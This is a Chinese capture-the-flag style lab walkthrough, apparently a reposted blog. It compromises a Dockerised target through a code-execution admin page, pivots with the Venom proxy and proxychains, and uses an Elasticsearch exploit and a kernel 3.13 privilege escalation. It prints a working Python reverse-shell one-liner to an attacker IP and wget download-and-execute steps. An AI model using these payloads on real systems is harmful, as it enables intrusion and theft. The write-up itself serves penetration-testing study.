一、前置知識：

1、arp-scan

Arp-scan的使用_她叫常玉瑩的博客-CSDN博客_arp-scan

2、venom——內網穿透工具

? ? ? ? 鏈接：Releases · Dliv3/Venom · GitHub

3、proxyproxychains

????????proxychains功能：proxychains可以讓命令通過指定的代理訪問網絡。

二、打靶步驟

1、靶機和主機處于同一網段，所以使用arp進行掃描

????????

? ? ? ? 判斷倒數第二個應該是靶機的ip

2、（1）nmap探測靶機開放端口:

?????????

?（2）nmap通過22和5000端口探測服務版本：

????????

? ? ? ? 可以看到22端口上跑的ssh，基于烏班圖系統；5000端口跑的httpd服務這不知道是什么，百度一下，基于python語言。

????????

3、既然發現了web的應用，在網頁上搜一下看有沒有web漏洞什么的，于是打開了一個頁面：

????????

?4、查看一下隱藏路徑，掃描一下目錄，思路：可以用burpsuit暴破常見目錄，或者御劍掃描目錄（win平臺），或者dirsearch（kali）

????????

? ? ? ?發現一個admin：

? ? ? ??

? ? ? ? 打開看到一個代碼執行的網頁，顯然這里可以試一下xss攻擊。百度一個python的反彈shell腳本進行提交，修改一下ip和端口：? ?

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.118.128",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

? ? ? ? 同時nc啟動監聽：

????????? ? ? ??

?????????

? ? ? ? kali端會有反彈的shell：

????????

? ? ? ? ls一下查看當前目錄文件，id一下查看當前獲得的權限

????????

? ? ? ? 雖然看到了root權限，但中等難度的靶機沒有這么簡單

5、ls下看到dockerfile文件，懷疑目前所在的是一個docker容器的系統，查看dockerfile文件，發現一些經典的docker操作指令：

????????

? ? ? ? ?既然是在docker容器里，那么查看一下當前docker容器的ip：

????????

? ? ? ? 也可以說是當前網站的內網網段，接下來的思路就是在內網進行主機的發現

6、發現內網網段比較大，16位的子網掩碼不允許我們手動一個一個ping，通過一個簡單的腳本實現一個內網網段的循環進行ping：

for i in $(seq 1 10); do ping -c 172.17.0.$i; done

????????

? ? ? ? 可以看到只有.1和.2回包了，使用kali直接探測內網網段的話行不通，因此需要進行內網穿透技術把路由打通。

7、venom進行內網滲透

? ? ? ? （1）由于目標機是linux系統，選擇將agent_linux_64發送到目標機，重命名為a方便操作；

? ? ? ? （2）在本地建立一個偵聽端口，等待目標系統和其建立反彈鏈接；

????????

? ? ? ? （3）在kali中啟動一個http服務，然后再目標機中運行wget直接通過wget將kali上的程序下載下來；

? ? ? ? 在kali中進入v1.1.0目錄，執行python3調用http啟動sever服務，監聽80端口。（這樣就在kali本機啟動了一個http的web服務）? ? ? ? ? ? ? ?

????????

? ? ? ? （4）再目標機中使用wget通過http服務將a下載下來，并賦予其可執行的權限：

???????????????

? ? ? ? （5）通過a連接遠程的服務器端；

? ? ? ? ? ? ? ? ./a rhos (kali-ip) -rport 9999

? ? ? ? ? ? ? ? ./a -rhost (kali ip) -rport?9999

????????

? ? ? ? （6）kali本機venom中查看發現已經有一個節點連上來了，goto到這個節點，并在這個節點上啟動一個socks的偵聽端口1080：

????????

8、為了讓kali中的所有工具都可以去訪問目標機使用，需要用到proxyproxychains，通過proxychain掛載當前的socks代理。讓nmap等工具都可以使用代理去掃目標機。

? ? ? ? （1）修改proxychains配置文件：

????????????????

? ? ? ? （2）使用poxychains對前面ping到的特殊.1和.2ip進行掃描：

????????

????????

????????

? ? ? ? 發現完全一樣

? ? ? ? 通過瀏覽器進行訪問（設置代理）也發現一樣

?????????

????????

? ? ? ? 也相同，說明172.17.0.1就是192.168.1.55那臺容器的宿主機，可判斷172.17.0.1就是我們要找的目標主機

? ? ? ? 同樣探測.2

（Elasticsearch是一個基于Lucene的搜索服務器。它提供了一個分布式多用戶能力的全文搜索引擎，基于RESTful web接口。Elasticsearch是用Java語言開發的，并作為Apache許可條款下的開放源碼發布，是一種流行的企業級搜索引擎。）

9、 kali中包含很多已知的漏洞代碼。

? ? ? ?（1） 搜索Elasticsearch：

????????

? ? ? ? 前兩行的都是遠程代碼執行的命令代碼，存放在后面的目錄。copy過來嘗試哪個可以攻入目標服務器

? ? ? ? （2）將36337腳本copy到當前目錄，查看一下

????????cp /usr/share/exploitdb/exploits/linux/remote/36337.py .

????????????????

????????

? ? ? ? 發現該腳本使用python2語言進行編寫，因此調用python2執行36337；查看id權限，為root，也是容器的root權限。
??????????? ? ? ? ?

? ? ? ? （3）ls查看目錄，發現passwords文件

????????

? ? ? ? 拿到用戶密碼hash值，百度md5破解：

????????? ? ? ??

? ? ? ? （4）拿著破解的用戶和密碼，嘗試登陸開放了22端口的目標主機（192.168.1.55），成功登錄目標主機：

????????

? ? ? ? 查看權限?，為普通用戶

????????

10、提權

? ? ? ? （1）查看內核為3.13利用內核漏洞進行提取

????????

? ? ? ? （2）查kali內有沒有3.13的漏洞

????????

? ? ? ? 實際滲透過程中要對可利用漏洞依次嘗試

? ? ? ? ?（3）選擇其中一種漏洞，copy到本地，然后查看：

????????

????????

? ? ? ? 這是c語言文件，先用gcc對其進行編譯，但嘗試發現目標機上沒有安裝gcc：

????????

? ? ? ? ?因此需要現在kali上進行編譯，但查看源代碼發現，代碼還包含著對一個文件的gcc編譯，修改代碼，刪除gcc編譯部分，直接對需要編譯的文件在kali上編譯好：

????????

????????

? ? ? ? （4）kali使用gcc編譯

???????????????

????????

? ? ? ? 找到剛剛c代碼中包含的需要編譯的文件ofs-lib.so，并進行copy

????????

? ? ? ? ?

? ? ? ? （5）將exp文件和ofs-lib.so文件一起copy到宿主機中

? ? ? ? ? ? ? ? kali開放http.server服務，宿主機wget下載文件，并將兩個文件移動到目標機的tmp目錄下方便執行。然后chmod賦予其執行權，執行exp文件，查看權限，成功將john提為root權限：

????????????????????????

????????

????????

????????????????

????????

?????????

????????

????????

????????

總結

以上是生活随笔為你收集整理的打靶——01（中等）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。